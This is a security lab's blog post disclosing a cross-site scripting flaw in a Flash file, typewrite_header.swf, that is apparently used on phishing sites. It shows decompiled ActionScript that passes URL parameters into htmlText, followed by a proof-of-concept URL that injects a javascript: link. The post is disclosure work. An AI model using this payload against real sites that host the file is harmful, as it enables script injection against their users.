Flash XSS on typewrite_header.swf

Flash XSS on typewrite_header.swf

Published on Author char49labsLeave a comment

Our lab found a interesting XSS on a .swf file that we later discover was mainly used on phishing websites.

Source code of typewrite_header.swf:

//----------------------------------------------------------------------
//Frame 3
//----------------------------------------------------------------------
gotoAndPlay (2);

//----------------------------------------------------------------------
//Frame 1
//----------------------------------------------------------------------
var q = 1;
var myurl = "http://xxxxxxxxxxxxxxxxxxxxxxxxx/";
var mytext1 = _root.thetitle;
var mytext2 = _root.thestrap;
_global.mytext = (("" + mytext1) + "
") + mytext2;

//----------------------------------------------------------------------
//Frame 2
//----------------------------------------------------------------------
if (q <= mytext.length) {
textbox.htmlText = mytext.substring(0, q);
q++;
} else {
textbox = mytext;
gotoAndStop (1);
}

So we have two parameters: thetitle and thestrap.

Proof-of-concept:

typewrite_header.swf?thetitle=%3Ca%20href=%27javascript:alert%28document.domain%29%27%3EClick%20me%3C/a%3E&thestrap=xss2
(which will need a click from the user to run the XSS payload)

For more information about Flash XSS please visit https://www.owasp.org/index.php/Testing_for_Cross_site_flashing_%28OTG-CLIENT-008%29

// David Sopas

Share on FacebookTweet about this on TwitterShare on Google+Share on LinkedIn

Leave a Reply

Your email address will not be published. Required fields are marked *